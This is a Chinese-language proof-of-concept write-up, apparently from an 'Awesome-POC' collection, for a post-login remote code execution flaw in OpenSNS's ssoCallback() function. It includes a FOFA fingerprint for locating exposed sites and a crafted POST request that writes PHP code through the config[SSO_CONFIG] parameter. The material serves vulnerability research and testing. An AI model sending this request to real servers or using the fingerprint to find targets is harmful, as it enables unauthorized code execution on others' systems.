Awesome-POC/CMS漏洞/OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞.md

41 lines
1.0 KiB
Markdown
Raw Normal View History

2022-05-18 16:23:08 +08:00
# OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
## 漏洞描述
OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取服务器权限
## 漏洞影响
```
OpenSNS
```
## FOFA
```
icon_hash="1167011145"
```
## 漏洞复现
登录页面如下
![image-20220518154117028](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541097.png)
存在漏洞的文件为 `Application/Admin/Controller/AuthorizeController.class.php`
![image-20220518154127216](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541309.png)
其中 config参数可控构造请求就可以通过 file_put_contents 写入执行任意命令
![image-20220518154143157](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181541252.png)
构造请求包
```
POST /admin.php?s=/Authorize/ssoCallback\
config[SSO_CONFIG]=phpinfo();
```
![image-20220518154206103](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181542195.png)